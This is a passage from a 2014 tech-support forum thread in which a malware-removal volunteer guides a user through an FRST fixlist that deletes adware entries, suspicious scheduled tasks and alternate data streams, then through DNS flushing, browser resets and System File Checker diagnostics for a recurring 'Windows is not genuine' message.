2014-09-23 10:03 - 2014-08-28 16:31 - 00130480 _____ () C:\Users\Camille\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-21 21:27 - 2012-09-16 19:11 - 00000000 ____D () C:\ProgramData\InstallMate
2014-09-21 21:26 - 2010-12-06 21:01 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\DVDVideoSoft
2014-09-21 03:01 - 2013-12-07 10:27 - 00000000 ____D () C:\Users\Camille\AppData\Local\Htc
2014-09-16 18:19 - 2009-07-14 00:13 - 00785946 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-10 17:22 - 2009-12-30 18:22 - 00003200 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForCamille
2014-09-10 17:22 - 2009-12-30 18:22 - 00000342 _____ () C:\Windows\Tasks\HPCeeScheduleForCamille.job
2014-09-03 13:03 - 2009-10-08 02:31 - 00000000 ____D () C:\ProgramData\Symantec
2014-09-03 13:02 - 2010-12-30 18:30 - 00003360 _____ () C:\Windows\System32\Tasks\RunAsStdUser Task
2014-09-03 13:02 - 2010-12-30 18:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin Games
2014-09-03 12:25 - 2013-10-12 10:47 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\Malwarebytes
2014-09-03 12:25 - 2013-10-12 10:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-03 12:25 - 2013-10-12 10:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-02 20:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Msdtc
2014-09-02 17:36 - 2009-10-27 14:56 - 00000000 ____D () C:\Windows\sold.old
2014-09-02 17:33 - 2009-12-29 17:55 - 00000000 ____D () C:\Users\Camille
2014-09-02 17:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\catroot2.old
 
Files to move or delete:
====================
C:\Users\Camille\jagex_runescape_preferences.dat
C:\Users\Camille\jagex_runescape_preferences2.dat
 
 
Some content of TEMP:
====================
C:\Users\Camille\AppData\Local\Temp\Quarantine.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-26 00:19
 
==================== End Of Log ============================

Attached Files



#6 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 01 October 2014 - 06:55 AM

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
Task: {08248352-EAC1-4D0C-B7DE-9B65F6A632E0} - System32\Tasks\4876 => Wscript.exe C:\Users\Camille\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {B716FFA7-068B-48D8-8C17-219587B2AA26} - System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
Task: {E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:37C8DB03
AlternateDataStreams: C:\ProgramData\Temp:46545F5C
AlternateDataStreams: C:\ProgramData\Temp:53F381F1
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:81B52FA6
AlternateDataStreams: C:\ProgramData\Temp:AB554F94
AlternateDataStreams: C:\ProgramData\Temp:ABE30DDB
AlternateDataStreams: C:\ProgramData\Temp:B894C266
AlternateDataStreams: C:\ProgramData\Temp:CF2C26D2
AlternateDataStreams: C:\ProgramData\Temp:D0F51BEA
AlternateDataStreams: C:\ProgramData\Temp:D82A9FCF
AlternateDataStreams: C:\ProgramData\Temp:E6427C0F
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
C:\ProgramData\Codec-V
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
C:\ProgramData\Premium\Codec
REBOOT:
End
Save the files as fixlist.txt into the same folder as FRST

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.
Latest version is Java JRE 7u67.

You can manually check your present version and update as recommended.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882


If present remove the old version(s) of Java using the Add/Remove Programs applet.

Java 6 Update 26

===

Critical vulnerabilities have been identified in old version of Adobe Flash Player please get the latest version.

Flash test site:
http://www.adobe.com/software/flash/about/
Install the new version or if you have the latest close the windows.

Flash Player Help / Find version
http://helpx.adobe.com/flash-player/kb/find-version-flash-player.html#main_Find_the_Flash_Player_version_installed_on_your_machine
===

How is the computer running now?

#7 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 06 October 2014 - 01:24 PM

Thank you, I updated Java and Flash.  Computer seems to be redirecting less, not genuine Windows message is still popping up.

 

fixlog.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 29-09-2014
Ran by Camille at 2014-10-02 11:15:17 Run:1
Running from C:\Users\Camille\Desktop\Troubleshooting
Loaded Profile: Camille (Available profiles: Camille)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
 
HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
Task: {08248352-EAC1-4D0C-B7DE-9B65F6A632E0} - System32\Tasks\4876 => Wscript.exe C:\Users\Camille\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {B716FFA7-068B-48D8-8C17-219587B2AA26} - System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
Task: {E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => C:\ProgramData\Premium\Codec\Codec.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:37C8DB03
AlternateDataStreams: C:\ProgramData\Temp:46545F5C
AlternateDataStreams: C:\ProgramData\Temp:53F381F1
AlternateDataStreams: C:\ProgramData\Temp:7C3E753C
AlternateDataStreams: C:\ProgramData\Temp:81B52FA6
AlternateDataStreams: C:\ProgramData\Temp:AB554F94
AlternateDataStreams: C:\ProgramData\Temp:ABE30DDB
AlternateDataStreams: C:\ProgramData\Temp:B894C266
AlternateDataStreams: C:\ProgramData\Temp:CF2C26D2
AlternateDataStreams: C:\ProgramData\Temp:D0F51BEA
AlternateDataStreams: C:\ProgramData\Temp:D82A9FCF
AlternateDataStreams: C:\ProgramData\Temp:E6427C0F
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
C:\ProgramData\Codec-V
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
C:\ProgramData\Premium\Codec
REBOOT:
End
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key deleted successfully.
"HKCR\CLSID\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{872E3F13-5682-407C-916D-A06C2195FC62}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => value deleted successfully.
"HKCR\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{5BED3930-2E9E-76D8-BACC-80DF2188D455} => value deleted successfully.
"HKCR\CLSID\{5BED3930-2E9E-76D8-BACC-80DF2188D455}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} => Moved successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\penmcajcdddmkfidjjpffbmnjfoofcda" => Key deleted successfully.
"C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx" => File/Directory not found.
ACDaemon => Service deleted successfully.
McciServiceHost => Service deleted successfully.
catchme => Service deleted successfully.
CVPNDrv => Service deleted successfully.
MREMPR5 => Service deleted successfully.
MRENDIS5 => Service deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{08248352-EAC1-4D0C-B7DE-9B65F6A632E0}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08248352-EAC1-4D0C-B7DE-9B65F6A632E0}" => Key deleted successfully.
C:\Windows\System32\Tasks\4876 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4876" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B716FFA7-068B-48D8-8C17-219587B2AA26}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B716FFA7-068B-48D8-8C17-219587B2AA26}" => Key deleted successfully.
C:\Windows\System32\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E03BC7FC-21F0-48F7-BA7F-96CFDFEDE67A}" => Key deleted successfully.
C:\Windows\System32\Tasks\0 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\0" => Key deleted successfully.
C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job => Moved successfully.
C:\ProgramData\Temp => ":37C8DB03" ADS removed successfully.
C:\ProgramData\Temp => ":46545F5C" ADS removed successfully.
C:\ProgramData\Temp => ":53F381F1" ADS removed successfully.
C:\ProgramData\Temp => ":7C3E753C" ADS removed successfully.
C:\ProgramData\Temp => ":81B52FA6" ADS removed successfully.
C:\ProgramData\Temp => ":AB554F94" ADS removed successfully.
C:\ProgramData\Temp => ":ABE30DDB" ADS removed successfully.
C:\ProgramData\Temp => ":B894C266" ADS removed successfully.
C:\ProgramData\Temp => ":CF2C26D2" ADS removed successfully.
C:\ProgramData\Temp => ":D0F51BEA" ADS removed successfully.
C:\ProgramData\Temp => ":D82A9FCF" ADS removed successfully.
C:\ProgramData\Temp => ":E6427C0F" ADS removed successfully.
C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
"C:\ProgramData\Codec-V" => File/Directory not found.
"C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}" => File/Directory not found.
"C:\ProgramData\Premium\Codec" => File/Directory not found.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====


#8 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 07 October 2014 - 07:54 AM

Click the StartBtn.gif button. In the Search box, type Command Prompt, and then, in the list of results, double-click Command Prompt.

at the cursor type:
ipconfig /flushdns <-- (A space between g and / is needed)

ipconfig /release

repeat with
ipconfig /renew

Then hit Enter, type Exit, hit the Enter key.

You may need to run CMD - Command Prompt on Vista - Windows 7/8 with Elevated Privilege
http://www.bleepingcomputer.com/tutorials/windows-elevated-command-prompt/
<<<>>>

If that fails to remove the Redirects try this.
...

Reset all you Browsers.

Reset Chrome...
Click on "Customize and control Google Chrome":
 
p22003758.gif
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
====

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F
===

Internet Explorer:
Menu > Tools > Internet Options > General Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.

===
 

the "windows is not genuine" message that pops up every day.


Runn the SFC.EXE tool.

How to use the System File Checker tool to troubleshoot missing or corrupted system files on Windows Vista or on Windows 7
http://support.microsoft.com/kb/929833

Keep me posted.

#9 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 13 October 2014 - 07:49 AM

Are you still with me?

#10 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 13 October 2014 - 09:33 AM

I am still here, thank you very much for your assistance.  I'm trying to help via TeamViewer & so when I released the ip lease I lost connection for a bit.  Running sfc right now.



#11 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 13 October 2014 - 09:45 AM

Windows Resource Protection found corrupt files but was unable to fix some of them.  Should I post CBS.log?



#12 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 13 October 2014 - 10:48 AM

Refer to this page.
http://support.microsoft.com/kb/928228

Execute these instructions.

You can search for [SR] tags to help locate SFC.exe program entries. To perform this kind of search and to redirect the results to a text file, follow these steps:
Click StartStart button, type cmd in the Start Search box, right-click cmd in the Programs list, and then click Run as administrator.

User Account Control permission If you are prompted for an administrator password or for a confirmation, type your password, or click Continue.
Type the following command, and then press ENTER:
findstr /c:"[SR]" %windir%\logs\cbs\cbs.log >sfcdetails.txt


Post or attach the sfcdetails.txt file.

#13 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 15 October 2014 - 12:48 PM

sfcdetails.txt

Attached Files



#14 nasdaq

nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:11:48 PM

Posted 17 October 2014 - 01:30 PM

Sorry for this delay. I had technical problems.

I see nothing wrong in last log.

#15 phill!

phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 20 October 2014 - 01:46 PM

No problem at all, I appreciate the help.  We're still getting the Windows isn't genuine message coming up daily even though Windows shows that it is activated.  I came here suspecting some sort of malware was the cause but maybe it's something wrong with Windows.  Any idea what else I could check?






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users